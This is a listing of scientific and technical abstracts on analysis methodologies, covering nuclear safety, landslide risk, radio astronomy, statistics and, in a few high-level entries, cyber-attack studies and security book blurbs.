    Results of a study comparing two approaches to the identification of important literature in endocrinology reveals that association between ranking of cited items using the two methods is not statistically significant and use of citation or historical analysis alone will not result in same set of literature. Forty-two sources are appended. (EJS)

  18. Boolean comparative analysis of qualitative data : a methodological note

    NARCIS (Netherlands)

    Romme, A.G.L.

    1995-01-01

    This paper explores the use of Boolean logic in the analysis of qualitative data, especially on the basis of so-called process theories. Process theories treat independent variables as necessary conditions which are binary rather than variable in nature, while the dependent variable is a final

  19. CANDU safety analysis system establishment; development of trip coverage and multi-dimensional hydrogen analysis methodology

    Energy Technology Data Exchange (ETDEWEB)

    Choi, Jong Ho; Ohn, M. Y.; Cho, C. H. [KOPEC, Taejon (Korea)

    2002-03-01

    The trip coverage analysis model requires the geometry network for primary and secondary circuit as well as the plant control system to simulate all the possible plant operating conditions throughout the plant life. The model was validated for the power maneuvering and the Wolsong 4 commissioning test. The trip coverage map was produced for the large break loss of coolant accident and the complete loss of class IV power event. The reliable multi-dimensional hydrogen analysis requires the high capability for thermal hydraulic modelling. To acquire such a basic capability and verify the applicability of GOTHIC code, the assessment of heat transfer model, hydrogen mixing and combustion model was performed. Also, the assessment methodology for flame acceleration and deflagration-to-detonation transition is established. 22 refs., 120 figs., 31 tabs. (Author)

  20. Big and complex data analysis methodologies and applications

    CERN Document Server

    2017-01-01

    This volume conveys some of the surprises, puzzles and success stories in high-dimensional and complex data analysis and related fields. Its peer-reviewed contributions showcase recent advances in variable selection, estimation and prediction strategies for a host of useful models, as well as essential new developments in the field. The continued and rapid advancement of modern technology now allows scientists to collect data of increasingly unprecedented size and complexity. Examples include epigenomic data, genomic data, proteomic data, high-resolution image data, high-frequency financial data, functional and longitudinal data, and network data. Simultaneous variable selection and estimation is one of the key statistical problems involved in analyzing such big and complex data. The purpose of this book is to stimulate research and foster interaction between researchers in the area of high-dimensional data analysis. More concretely, its goals are to: 1) highlight and expand the breadth of existing methods in...

  1. Environmental analysis applied to schools. Methodologies for data acquisition

    International Nuclear Information System (INIS)

    Andriola, L.; Ceccacci, R.

    2001-01-01

    The environment analysis is the basis of environmental management for organizations and it is considered as the first step in EMAS. It allows to identify, deal with the issues and have a clear knowledge on environmental performances of organizations. Schools can be included in the organizations. Nevertheless, the complexity of environmental issues and applicable regulations makes very difficult for a school, that wants to implement an environmental management system (EMAS, ISO 14001, etc.), to face this first step. So, it has been defined an instrument, that is easy but complete and coherent with reference standard, to let schools choose their process for elaborating the initial environmental revue. This instrument consists, essentially, in cards that, if completed, facilitate the drafting of the environmental analysis report [it

  2. Development of analysis methodology for hot leg break mass and energy release

    International Nuclear Information System (INIS)

    Song, Jin Ho; Kim, Cheol Woo; Kwon, Young Min; Kim, Sook Kwan

    1995-04-01

    A study for the development of an analysis methodology for hot leg break mass and energy release is performed. For the blowdown period a modified CEFLASH-4A methodology is suggested. For the post blowdown period a modified CONTRAST boil-off model is suggested. By using these computer code improved mass and energy release data are generated. Also, a RELAP5/MOD3 analysis for finally the FLOOD-3 computer code has been modified for use in the analysis of hot leg break. The results of analysis using modified FLOOD-3 are reasonable as we expected and their trends are good. 66 figs., 8 tabs. (Author) .new

  3. Exploratory market structure analysis. Topology-sensitive methodology.

    OpenAIRE

    Mazanec, Josef

    1999-01-01

    Given the recent abundance of brand choice data from scanner panels market researchers have neglected the measurement and analysis of perceptions. Heterogeneity of perceptions is still a largely unexplored issue in market structure and segmentation studies. Over the last decade various parametric approaches toward modelling segmented perception-preference structures such as combined MDS and Latent Class procedures have been introduced. These methods, however, are not taylored for qualitative ...

  4. On the methodology of the analysis of Moessbauer spectra

    International Nuclear Information System (INIS)

    Vandenberghe, R.E.; Grave, E. de; Bakker, P.M.A. de

    1994-01-01

    A review is presented of the direct fitting procedures which are used in the analysis of Moessbauer spectra. Direct lineshape fitting with alternative profiles as well as shape-dependent, shape-independent and quasi shape-independent distribution fitting methods all can easily be incorporated in one computer program scheme yielding a large versatility for modification and/or extension of the programs according to specific spectra. (orig.)

  5. Methodological issues underlying multiple decrement life table analysis.

    Science.gov (United States)

    Mode, C J; Avery, R C; Littman, G S; Potter, R G

    1977-02-01

    In this paper, the actuarial method of multiple decrement life table analysis of censored, longitudinal data is examined. The discussion is organized in terms of the first segment of usage of an intrauterine device. Weaknesses of the actuarial approach are pointed out, and an alternative approach, based on the classical model of competing risks, is proposed. Finally, the actuarial and the alternative method of analyzing censored data are compared, using data from the Taichung Medical Study on Intrauterine Devices.

  6. Applications of the TSUNAMI sensitivity and uncertainty analysis methodology

    International Nuclear Information System (INIS)

    Rearden, Bradley T.; Hopper, Calvin M.; Elam, Karla R.; Goluoglu, Sedat; Parks, Cecil V.

    2003-01-01

    The TSUNAMI sensitivity and uncertainty analysis tools under development for the SCALE code system have recently been applied in four criticality safety studies. TSUNAMI is used to identify applicable benchmark experiments for criticality code validation, assist in the design of new critical experiments for a particular need, reevaluate previously computed computational biases, and assess the validation coverage and propose a penalty for noncoverage for a specific application. (author)

  7. Evaluation of Crosstalk Attacks in Access Networks

    DEFF Research Database (Denmark)

    Wagner, Christoph; Eiselt, Michael; Grobe, Klaus

    2016-01-01

    WDM-PON systems regained interest as low-cost solution for metro and access networks. We present a comparative analysis of resilience of wavelength-selective and wavelength-routed architectures against crosstalk attackers. We compare the vulnerability of these architectures against attacks...

  8. Seven Deadliest Microsoft Attacks

    CERN Document Server

    Kraus, Rob; Borkin, Mike; Alpern, Naomi

    2010-01-01

    Do you need to keep up with the latest hacks, attacks, and exploits effecting Microsoft products? Then you need Seven Deadliest Microsoft Attacks. This book pinpoints the most dangerous hacks and exploits specific to Microsoft applications, laying out the anatomy of these attacks including how to make your system more secure. You will discover the best ways to defend against these vicious hacks with step-by-step instruction and learn techniques to make your computer and network impenetrable. Windows Operating System-Password AttacksActive Directory-Escalat

  9. Transient Ischemic Attack

    Medline Plus

    Full Text Available ... stroke symptoms. Popular Topics TIA Cardiac Catheter Cholesterol Heart Attack Stent © 2018, American Heart Association, Inc. All rights reserved. Unauthorized use prohibited. ...

  10. Seven deadliest USB attacks

    CERN Document Server

    Anderson, Brian

    2010-01-01

    Do you need to keep up with the latest hacks, attacks, and exploits effecting USB technology? Then you need Seven Deadliest USB Attacks. This book pinpoints the most dangerous hacks and exploits specific to USB, laying out the anatomy of these attacks including how to make your system more secure. You will discover the best ways to defend against these vicious hacks with step-by-step instruction and learn techniques to make your computer and network impenetrable. Attacks detailed in this book include: USB Hacksaw USB Switchblade USB Based Virus/Malicous Code Launch USB Device Overflow RAMdum

  11. Final report : impacts analysis for cyber attack on electric power systems (National SCADA Test Bed FY08).

    Energy Technology Data Exchange (ETDEWEB)

    Phillips, Laurence R.; Richardson, Bryan T.; Stamp, Jason Edwin; LaViolette, Randall A.

    2009-02-01

    To analyze the risks due to cyber attack against control systems used in the United States electrical infrastructure, new algorithms are needed to determine the possible impacts. This research is studying the Reliability Impact of Cyber ttack (RICA) in a two-pronged approach. First, malevolent cyber actions are analyzed in terms of reduced grid reliability. Second, power system impacts are investigated using an abstraction of the grid's dynamic model. This second year of esearch extends the work done during the first year.

  12. Development of Methodology for Spent Fuel Pool Severe Accident Analysis Using MELCOR Program

    Energy Technology Data Exchange (ETDEWEB)

    Kim, Won-Tae; Shin, Jae-Uk [RETech. Co. LTD., Yongin (Korea, Republic of); Ahn, Kwang-Il [KAERI, Daejeon (Korea, Republic of)

    2015-05-15

    The general reason why SFP severe accident analysis has to be considered is that there is a potential great risk due to the huge number of fuel assemblies and no containment in a SFP building. In most cases, the SFP building is vulnerable to external damage or attack. In contrary, low decay heat of fuel assemblies may make the accident processes slow compared to the accident in reactor core because of a great deal of water. In short, its severity of consequence cannot exclude the consideration of SFP risk management. The U.S. Nuclear Regulatory Commission has performed the consequence studies of postulated spent fuel pool accident. The Fukushima-Daiichi accident has accelerated the needs for the consequence studies of postulated spent fuel pool accidents, causing the nuclear industry and regulatory bodies to reexamine several assumptions concerning beyond-design basis events such as a station blackout. The tsunami brought about the loss of coolant accident, leading to the explosion of hydrogen in the SFP building. Analyses of SFP accident processes in the case of a loss of coolant with no heat removal have studied. Few studies however have focused on a long term process of SFP severe accident under no mitigation action such as a water makeup to SFP. USNRC and OECD have co-worked to examine the behavior of PWR fuel assemblies under severe accident conditions in a spent fuel rack. In support of the investigation, several new features of MELCOR model have been added to simulate both BWR fuel assembly and PWR 17 x 17 assembly in a spent fuel pool rack undergoing severe accident conditions. The purpose of the study in this paper is to develop a methodology of the long-term analysis for the plant level SFP severe accident by using the new-featured MELCOR program in the OPR-1000 Nuclear Power Plant. The study is to investigate the ability of MELCOR in predicting an entire process of SFP severe accident phenomena including the molten corium and concrete reaction. The

  13. Effectiveness of Trigger Point Manual Treatment on the Frequency, Intensity, and Duration of Attacks in Primary Headaches: A Systematic Review and Meta-Analysis of Randomized Controlled Trials

    Directory of Open Access Journals (Sweden)

    Luca Falsiroli Maistrello

    2018-04-01

    Full Text Available BackgroundA variety of interventions has been proposed for symptomatology relief in primary headaches. Among these, manual trigger points (TrPs treatment gains popularity, but its effects have not been investigated yet.ObjectiveThe aim was to establish the effectiveness of manual TrP compared to minimal active or no active interventions in terms of frequency, intensity, and duration of attacks in adult people with primary headaches.MethodsWe searched MEDLINE, COCHRANE, Web Of Science, and PEDro databases up to November 2017 for randomized controlled trials (RCTs. Two independent reviewers appraised the risk-of-bias (RoB and the grading of recommendations, assessment, development, and evaluation (GRADE to evaluate the overall quality of evidence.ResultsSeven RCTs that compared manual treatment vs minimal active intervention were included: 5 focused on tension-type headache (TTH and 2 on Migraine (MH; 3 out of 7 RCTs had high RoB. Combined TTH and MH results show statistically significant reduction for all outcomes after treatment compared to controls, but the level of evidence was very low. Subgroup analysis showed a statistically significant reduction in attack frequency (no. of attacks per month after treatment in TTH (MD −3.50; 95% CI from −4.91 to −2.09; 4 RCTs and in MH (MD −1.92; 95% CI from −3.03 to −0.80; 2 RCTs. Pain intensity (0–100 scale was reduced in TTH (MD −12.83; 95% CI from −19.49 to −6.17; 4 RCTs and in MH (MD −13.60; 95% CI from −19.54 to −7.66; 2RCTs. Duration of attacks (hours was reduced in TTH (MD −0.51; 95% CI from −0.97 to −0.04; 2 RCTs and in MH (MD −10.68; 95% CI from −14.41 to −6.95; 1 RCT.ConclusionManual TrPs treatment of head and neck muscles may reduce frequency, intensity, and duration of attacks in TTH and MH, but the quality of evidence according to GRADE approach was very low for the presence of few studies, high RoB, and imprecision of results.

  14. Integrated modeling and analysis methodology for precision pointing applications

    Science.gov (United States)

    Gutierrez, Homero L.

    2002-07-01

    Space-based optical systems that perform tasks such as laser communications, Earth imaging, and astronomical observations require precise line-of-sight (LOS) pointing. A general approach is described for integrated modeling and analysis of these types of systems within the MATLAB/Simulink environment. The approach can be applied during all stages of program development, from early conceptual design studies to hardware implementation phases. The main objective is to predict the dynamic pointing performance subject to anticipated disturbances and noise sources. Secondary objectives include assessing the control stability, levying subsystem requirements, supporting pointing error budgets, and performing trade studies. The integrated model resides in Simulink, and several MATLAB graphical user interfaces (GUI"s) allow the user to configure the model, select analysis options, run analyses, and process the results. A convenient parameter naming and storage scheme, as well as model conditioning and reduction tools and run-time enhancements, are incorporated into the framework. This enables the proposed architecture to accommodate models of realistic complexity.

  15. Adaptive cyber-attack modeling system

    Science.gov (United States)

    Gonsalves, Paul G.; Dougherty, Edward T.

    2006-05-01

    The pervasiveness of software and networked information systems is evident across a broad spectrum of business and government sectors. Such reliance provides an ample opportunity not only for the nefarious exploits of lone wolf computer hackers, but for more systematic software attacks from organized entities. Much effort and focus has been placed on preventing and ameliorating network and OS attacks, a concomitant emphasis is required to address protection of mission critical software. Typical software protection technique and methodology evaluation and verification and validation (V&V) involves the use of a team of subject matter experts (SMEs) to mimic potential attackers or hackers. This manpower intensive, time-consuming, and potentially cost-prohibitive approach is not amenable to performing the necessary multiple non-subjective analyses required to support quantifying software protection levels. To facilitate the evaluation and V&V of software protection solutions, we have designed and developed a prototype adaptive cyber attack modeling system. Our approach integrates an off-line mechanism for rapid construction of Bayesian belief network (BN) attack models with an on-line model instantiation, adaptation and knowledge acquisition scheme. Off-line model construction is supported via a knowledge elicitation approach for identifying key domain requirements and a process for translating these requirements into a library of BN-based cyber-attack models. On-line attack modeling and knowledge acquisition is supported via BN evidence propagation and model parameter learning.

  16. Methodology for Design and Analysis of Reactive Distillation Involving Multielement Systems

    DEFF Research Database (Denmark)

    Jantharasuk, Amnart; Gani, Rafiqul; Górak, Andrzej

    2011-01-01

    A new methodology for design and analysis of reactive distillation has been developed. In this work, the elementbased approach, coupled with a driving force diagram, has been extended and applied to the design of a reactive distillation column involving multielement (multicomponent) systems...... consisting of two components. Based on this methodology, an optimal design configuration is identified using the equivalent binary-element-driving force diagram. Two case studies of methyl acetate (MeOAc) synthesis and methyl-tert-butyl ether (MTBE) synthesis have been considered to demonstrate...... the successful applications of the methodology. Moreover, energy requirements for various column configurations corresponding to different feed locatio...

  17. Landslide risk analysis: a multi-disciplinary methodological approach

    Directory of Open Access Journals (Sweden)

    S. Sterlacchini

    2007-11-01

    Full Text Available This study describes an analysis carried out within the European community project "ALARM" (Assessment of Landslide Risk and Mitigation in Mountain Areas, 2004 on landslide risk assessment in the municipality of Corvara in Badia, Italy. This mountainous area, located in the central Dolomites (Italian Alps, poses a significant landslide hazard to several man-made and natural objects. Three parameters for determining risk were analysed as an aid to preparedness and mitigation planning: event occurrence probability, elements at risk, and the vulnerability of these elements. Initially, a landslide hazard scenario was defined; this step was followed by the identification of the potential vulnerable elements, by the estimation of the expected physical effects, due to the occurrence of a damaging phenomenon, and by the analysis of social and economic features of the area. Finally, a potential risk scenario was defined, where the relationships between the event, its physical effects, and its economic consequences were investigated. People and public administrators with training and experience in local landsliding and slope processes were involved in each step of the analysis.

    A "cause-effect" correlation was applied, derived from the "dose-response" equation initially used in the biological sciences and then adapted by economists for the assessment of environmental risks. The relationship was analysed from a physical point of view and the cause (the natural event was correlated to the physical effects, i.e. the aesthetic, functional, and structural damage. An economic evaluation of direct and indirect damage was carried out considering the assets in the affected area (i.e., tourist flows, goods, transport and the effect on other social and economic activities. This study shows the importance of indirect damage, which is as significant as direct damage. The total amount of direct damage was estimated in 8 913 000 €; on the contrary, indirect

  18. Landslide risk analysis: a multi-disciplinary methodological approach

    Science.gov (United States)

    Sterlacchini, S.; Frigerio, S.; Giacomelli, P.; Brambilla, M.

    2007-11-01

    This study describes an analysis carried out within the European community project "ALARM" (Assessment of Landslide Risk and Mitigation in Mountain Areas, 2004) on landslide risk assessment in the municipality of Corvara in Badia, Italy. This mountainous area, located in the central Dolomites (Italian Alps), poses a significant landslide hazard to several man-made and natural objects. Three parameters for determining risk were analysed as an aid to preparedness and mitigation planning: event occurrence probability, elements at risk, and the vulnerability of these elements. Initially, a landslide hazard scenario was defined; this step was followed by the identification of the potential vulnerable elements, by the estimation of the expected physical effects, due to the occurrence of a damaging phenomenon, and by the analysis of social and economic features of the area. Finally, a potential risk scenario was defined, where the relationships between the event, its physical effects, and its economic consequences were investigated. People and public administrators with training and experience in local landsliding and slope processes were involved in each step of the analysis. A "cause-effect" correlation was applied, derived from the "dose-response" equation initially used in the biological sciences and then adapted by economists for the assessment of environmental risks. The relationship was analysed from a physical point of view and the cause (the natural event) was correlated to the physical effects, i.e. the aesthetic, functional, and structural damage. An economic evaluation of direct and indirect damage was carried out considering the assets in the affected area (i.e., tourist flows, goods, transport and the effect on other social and economic activities). This study shows the importance of indirect damage, which is as significant as direct damage. The total amount of direct damage was estimated in 8 913 000 €; on the contrary, indirect damage ranged considerably

  19. Mediation analysis in nursing research: a methodological review.

    Science.gov (United States)

    Liu, Jianghong; Ulrich, Connie

    2016-12-01

    Mediation statistical models help clarify the relationship between independent predictor variables and dependent outcomes of interest by assessing the impact of third variables. This type of statistical analysis is applicable for many clinical nursing research questions, yet its use within nursing remains low. Indeed, mediational analyses may help nurse researchers develop more effective and accurate prevention and treatment programs as well as help bridge the gap between scientific knowledge and clinical practice. In addition, this statistical approach allows nurse researchers to ask - and answer - more meaningful and nuanced questions that extend beyond merely determining whether an outcome occurs. Therefore, the goal of this paper is to provide a brief tutorial on the use of mediational analyses in clinical nursing research by briefly introducing the technique and, through selected empirical examples from the nursing literature, demonstrating its applicability in advancing nursing science.

  20. Methodology for analysis and simulation of large multidisciplinary problems

    Science.gov (United States)

    Russell, William C.; Ikeda, Paul J.; Vos, Robert G.

    1989-01-01

    The Integrated Structural Modeling (ISM) program is being developed for the Air Force Weapons Laboratory and will be available for Air Force work. Its goal is to provide a design, analysis, and simulation tool intended primarily for directed energy weapons (DEW), kinetic energy weapons (KEW), and surveillance applications. The code is designed to run on DEC (VMS and UNIX), IRIS, Alliant, and Cray hosts. Several technical disciplines are included in ISM, namely structures, controls, optics, thermal, and dynamics. Four topics from the broad ISM goal are discussed. The first is project configuration management and includes two major areas: the software and database arrangement and the system model control. The second is interdisciplinary data transfer and refers to exchange of data between various disciplines such as structures and thermal. Third is a discussion of the integration of component models into one system model, i.e., multiple discipline model synthesis. Last is a presentation of work on a distributed processing computing environment.

  1. THE MURCHISON WIDEFIELD ARRAY 21 cm POWER SPECTRUM ANALYSIS METHODOLOGY

    Energy Technology Data Exchange (ETDEWEB)

    Jacobs, Daniel C.; Beardsley, A. P.; Bowman, Judd D. [Arizona State University, School of Earth and Space Exploration, Tempe, AZ 85287 (United States); Hazelton, B. J.; Sullivan, I. S.; Barry, N.; Carroll, P. [University of Washington, Department of Physics, Seattle, WA 98195 (United States); Trott, C. M.; Pindor, B.; Briggs, F.; Gaensler, B. M. [ARC Centre of Excellence for All-sky Astrophysics (CAASTRO) (Australia); Dillon, Joshua S.; Oliveira-Costa, A. de; Ewall-Wice, A.; Feng, L. [MIT Kavli Institute for Astrophysics and Space Research, Cambridge, MA 02139 (United States); Pober, J. C. [Brown University, Department of Physics, Providence, RI 02912 (United States); Bernardi, G. [Department of Physics and Electronics, Rhodes University, Grahamstown 6140 (South Africa); Cappallo, R. J.; Corey, B. E. [MIT Haystack Observatory, Westford, MA 01886 (United States); Emrich, D., E-mail: daniel.c.jacobs@asu.edu [International Centre for Radio Astronomy Research, Curtin University, Perth, WA 6845 (Australia); and others

    2016-07-10

    We present the 21 cm power spectrum analysis approach of the Murchison Widefield Array Epoch of Reionization project. In this paper, we compare the outputs of multiple pipelines for the purpose of validating statistical limits cosmological hydrogen at redshifts between 6 and 12. Multiple independent data calibration and reduction pipelines are used to make power spectrum limits on a fiducial night of data. Comparing the outputs of imaging and power spectrum stages highlights differences in calibration, foreground subtraction, and power spectrum calculation. The power spectra found using these different methods span a space defined by the various tradeoffs between speed, accuracy, and systematic control. Lessons learned from comparing the pipelines range from the algorithmic to the prosaically mundane; all demonstrate the many pitfalls of neglecting reproducibility. We briefly discuss the way these different methods attempt to handle the question of evaluating a significant detection in the presence of foregrounds.

  2. Methodology for global nonlinear analysis of nuclear systems

    International Nuclear Information System (INIS)

    Cacuci, D.G.; Cacuci, G.L.

    1987-01-01

    This paper outlines a general method for globally computing the crucial features of nonlinear problems: bifurcations, limit points, saddle points, extrema (maxima and minima); our method also yields the local sensitivities (i.e., first order derivatives) of the system's state variables (e.g., fluxes, power, temperatures, flows) at any point in the system's phase space. We also present an application of this method to the nonlinear BWR model discussed in Refs. 8 and 11. The most significant novel feature of our method is the recasting of a general mathematical problem comprising three aspects: (1) nonlinear constrained optimization, (2) sensitivity analysis, into a fixed point problem of the form F[u(s), λ(s)] = 0 whose global zeros and singular points are related to the special features (i.e., extrema, bifurcations, etc.) of the original problem

  3. New approaches in intelligent image analysis techniques, methodologies and applications

    CERN Document Server

    Nakamatsu, Kazumi

    2016-01-01

    This book presents an Introduction and 11 independent chapters, which are devoted to various new approaches of intelligent image processing and analysis. The book also presents new methods, algorithms and applied systems for intelligent image processing, on the following basic topics: Methods for Hierarchical Image Decomposition; Intelligent Digital Signal Processing and Feature Extraction; Data Clustering and Visualization via Echo State Networks; Clustering of Natural Images in Automatic Image Annotation Systems; Control System for Remote Sensing Image Processing; Tissue Segmentation of MR Brain Images Sequence; Kidney Cysts Segmentation in CT Images; Audio Visual Attention Models in Mobile Robots Navigation; Local Adaptive Image Processing; Learning Techniques for Intelligent Access Control; Resolution Improvement in Acoustic Maps. Each chapter is self-contained with its own references. Some of the chapters are devoted to the theoretical aspects while the others are presenting the practical aspects and the...

  4. A faster reactor transient analysis methodology for PCs

    International Nuclear Information System (INIS)

    Ott, K.O.

    1991-10-01

    The simplified ANL model for LMR transient analysis, in which point kinetics as well as lumped descriptions of the heat transfer equations in all components are applied, is converted from a differential into an integral formulation. All differential balance equations are implicitly solved in terms of convolution integrals. The prompt jump approximation is applied as the strong negative feedback effectively keeps the net reactivity well below prompt critical. After implicit finite differencing of the convolution integrals, the kinetics equation assumes the form of a quadratic equation, the ''quadratic dynamics equation.'' This model forms the basis for GW-BASIC program, LTC, for LMR Transient Calculation program, which can effectively be run on a PC. The GW-BASIC version of the LTC program is described in detail in Volume 2 of this report

  5. Methodology for diagnosing of skin cancer on images of dermatologic spots by spectral analysis

    OpenAIRE

    Guerra-Rosas, Esperanza; Álvarez-Borrego, Josué

    2015-01-01

    In this paper a new methodology for the diagnosing of skin cancer on images of dermatologic spots using image processing is presented. Currently skin cancer is one of the most frequent diseases in humans. This methodology is based on Fourier spectral analysis by using filters such as the classic, inverse and k-law nonlinear. The sample images were obtained by a medical specialist and a new spectral technique is developed to obtain a quantitative measurement of the complex pattern found in can...

  6. submitter Methodologies for the Statistical Analysis of Memory Response to Radiation

    CERN Document Server

    Bosser, Alexandre L; Tsiligiannis, Georgios; Frost, Christopher D; Zadeh, Ali; Jaatinen, Jukka; Javanainen, Arto; Puchner, Helmut; Saigne, Frederic; Virtanen, Ari; Wrobel, Frederic; Dilillo, Luigi

    2016-01-01

    Methodologies are proposed for in-depth statistical analysis of Single Event Upset data. The motivation for using these methodologies is to obtain precise information on the intrinsic defects and weaknesses of the tested devices, and to gain insight on their failure mechanisms, at no additional cost. The case study is a 65 nm SRAM irradiated with neutrons, protons and heavy ions. This publication is an extended version of a previous study [1].

  7. Fuzzy Clustering based Methodology for Multidimensional Data Analysis in Computational Forensic Domain

    OpenAIRE

    Kilian Stoffel; Paul Cotofrei; Dong Han

    2012-01-01

    As interdisciplinary domain requiring advanced and innovative methodologies the computational forensics domain is characterized by data being simultaneously large scaled and uncertain multidimensional and approximate. Forensic domain experts trained to discover hidden pattern from crime data are limited in their analysis without the assistance of a computational intelligence approach. In this paper a methodology and an automatic procedure based on fuzzy set theory and designed to infer precis...

  8. Methodology of the Integrated Analysis of Company's Financial Status and Its Performance Results

    OpenAIRE

    Mackevičius, Jonas; Valkauskas, Romualdas

    2010-01-01

    Information about company's financial status and its performance results is very important for the objective evaluation of company's position in the market and competitive possibilities in the future. Such information is provided in the financial statement. It is important to apply and investigate this information properly. The methodology of company's financial status and performance results integrated analysis is recommended in this article. This methodology consists of these three elements...

  9. A fast reactor transient analysis methodology for personal computers

    International Nuclear Information System (INIS)

    Ott, K.O.

    1993-01-01

    A simplified model for a liquid-metal-cooled reactor (LMR) transient analysis, in which point kinetics as well as lumped descriptions of the heat transfer equations in all components are applied, is converted from a differential into an integral formulation. All 30 differential balance equations are implicitly solved in terms of convolution integrals. The prompt jump approximation is applied as the strong negative feedback effectively keeps the net reactivity well below prompt critical. After implicit finite differencing of the convolution integrals, the kinetics equation assumes a new form, i.e., the quadratic dynamics equation. In this integral formulation, the initial value problem of typical LMR transients can be solved with large item steps (initially 1 s, later up to 256 s). This then makes transient problems amenable to a treatment on personal computer. The resulting mathematical model forms the basis for the GW-BASIC program LMR transient calculation (LTC) program. The LTC program has also been converted to QuickBASIC. The running time for a 10-h transient overpower transient is then ∼40 to 10 s, depending on the hardware version (286, 386, or 486 with math coprocessors)

  10. Textbooks in transitional countries: Towards a methodology for comparative analysis

    Directory of Open Access Journals (Sweden)

    Miha Kovač

    2004-01-01

    Full Text Available In its first part, the paper analyses the ambiguous nature of the book as a medium: its physical production and its distribution to the end user takes place on a market basis; on the other hand, its content is predominantly consumed in a sector that was at least in the continental Europe traditionally considered as public and non-profit making. This ambiguous nature of the book and with it the impact of the market on the organization of knowledge in book format remains a dark spot in contemporary book research. On the other hand, textbooks are considered as ephemera both in contemporary education and book studies. Therefore, research on textbooks publishing models could be considered as a blind-spot of contemporary social studies. As a consequence, in the majority of European countries, textbook publishing and the organization of the textbook market are considered as self-evident. Throughout a comparative analysis of textbook publishing models in small transitional and developed countries, the paper points out that this self-evident organization of the textbook market is always culturally determined. In its final part, the paper compares different models of textbook publishing and outlines the scenarios for the development of the Slovene textbook market.

  11. Energy minimization in medical image analysis: Methodologies and applications.

    Science.gov (United States)

    Zhao, Feng; Xie, Xianghua

    2016-02-01

    Energy minimization is of particular interest in medical image analysis. In the past two decades, a variety of optimization schemes have been developed. In this paper, we present a comprehensive survey of the state-of-the-art optimization approaches. These algorithms are mainly classified into two categories: continuous method and discrete method. The former includes Newton-Raphson method, gradient descent method, conjugate gradient method, proximal gradient method, coordinate descent method, and genetic algorithm-based method, while the latter covers graph cuts method, belief propagation method, tree-reweighted message passing method, linear programming method, maximum margin learning method, simulated annealing method, and iterated conditional modes method. We also discuss the minimal surface method, primal-dual method, and the multi-objective optimization method. In addition, we review several comparative studies that evaluate the performance of different minimization techniques in terms of accuracy, efficiency, or complexity. These optimization techniques are widely used in many medical applications, for example, image segmentation, registration, reconstruction, motion tracking, and compressed sensing. We thus give an overview on those applications as well. Copyright © 2015 John Wiley & Sons, Ltd.

  12. Automatic Classification of Attacks on IP Telephony

    Directory of Open Access Journals (Sweden)

    Jakub Safarik

    2013-01-01

    Full Text Available This article proposes an algorithm for automatic analysis of attack data in IP telephony network with a neural network. Data for the analysis is gathered from variable monitoring application running in the network. These monitoring systems are a typical part of nowadays network. Information from them is usually used after attack. It is possible to use an automatic classification of IP telephony attacks for nearly real-time classification and counter attack or mitigation of potential attacks. The classification use proposed neural network, and the article covers design of a neural network and its practical implementation. It contains also methods for neural network learning and data gathering functions from honeypot application.

  13. Economy As A Phenomenon Of Culture: Theoretical And Methodological Analysis

    Directory of Open Access Journals (Sweden)

    S. N. Ivaskovsky

    2017-01-01

    Full Text Available The article redefines economy as a phenomenon of culture, a product of a historically and socially grounded set of values shared by members of a given society. The research shows that culture is not always identical to social utility, because there are multiple examples when archaic, traditionalist, irrational cultural norms hinder social and economic progress and trap nations into poverty and underdevelopment. One of the reasons for the lack of scholarly attention to cultural dimension of economy is the triumph of positivism in economics. Mathematics has become the dominant language of economic analysis. It leads to the transformation of the economics into a sort of «social physics», accompanied by the loss of its original humanitarian nature shared in the works of all the great economists of the past. The author emphasizes the importance of the interdisciplinary approach to the economic research and the incorporation of the achievements of the other social disciplines – history, philosophy, sociology and cultural studies - into the subject matter of economic theory. Substantiating the main thesis of the article, the author shows that there is a profound ontological bond between economy and culture, which primarily consists in the fact that these spheres of human relations are aimed at the solution of the same problem – the competitive selection of the best ways for survival of people, of satisfying the relevant living needs. In order to overcome the difficulties related to the inclusion of culture in the set of analytical tools used in the economic theory, the author suggests using a category of «cultural capital», which reestablishes the earlier and more familiar for the economists meaning of capital.

  14. Mathematical modelling methodologies in predictive food microbiology: a SWOT analysis.

    Science.gov (United States)

    Ferrer, Jordi; Prats, Clara; López, Daniel; Vives-Rego, Josep

    2009-08-31

    Predictive microbiology is the area of food microbiology that attempts to forecast the quantitative evolution of microbial populations over time. This is achieved to a great extent through models that include the mechanisms governing population dynamics. Traditionally, the models used in predictive microbiology are whole-system continuous models that describe population dynamics by means of equations applied to extensive or averaged variables of the whole system. Many existing models can be classified by specific criteria. We can distinguish between survival and growth models by seeing whether they tackle mortality or cell duplication. We can distinguish between empirical (phenomenological) models, which mathematically describe specific behaviour, and theoretical (mechanistic) models with a biological basis, which search for the underlying mechanisms driving already observed phenomena. We can also distinguish between primary, secondary and tertiary models, by examining their treatment of the effects of external factors and constraints on the microbial community. Recently, the use of spatially explicit Individual-based Models (IbMs) has spread through predictive microbiology, due to the current technological capacity of performing measurements on single individual cells and thanks to the consolidation of computational modelling. Spatially explicit IbMs are bottom-up approaches to microbial communities that build bridges between the description of micro-organisms at the cell level and macroscopic observations at the population level. They provide greater insight into the mesoscale phenomena that link unicellular and population levels. Every model is built in response to a particular question and with different aims. Even so, in this research we conducted a SWOT (Strength, Weaknesses, Opportunities and Threats) analysis of the different approaches (population continuous modelling and Individual-based Modelling), which we hope will be helpful for current and future

  15. Plants under dual attack

    NARCIS (Netherlands)

    Ponzio, C.A.M.

    2016-01-01

    Though immobile, plants are members of complex environments, and are under constant threat from a wide range of attackers, which includes organisms such as insect herbivores or plant pathogens. Plants have developed sophisticated defenses against these attackers, and include chemical responses

  16. Heart attack - discharge

    Science.gov (United States)

    ... and lifestyle Cholesterol - drug treatment Controlling your high blood pressure Deep vein thrombosis - discharge Dietary fats explained Fast food tips Heart attack - discharge Heart attack - what to ask your doctor Heart bypass ... pacemaker - discharge High blood pressure - what to ask your doctor How to read ...

  17. Fukushima Daiichi unit 1 uncertainty analysis--Preliminary selection of uncertain parameters and analysis methodology

    Energy Technology Data Exchange (ETDEWEB)

    Cardoni, Jeffrey N.; Kalinich, Donald A.

    2014-02-01

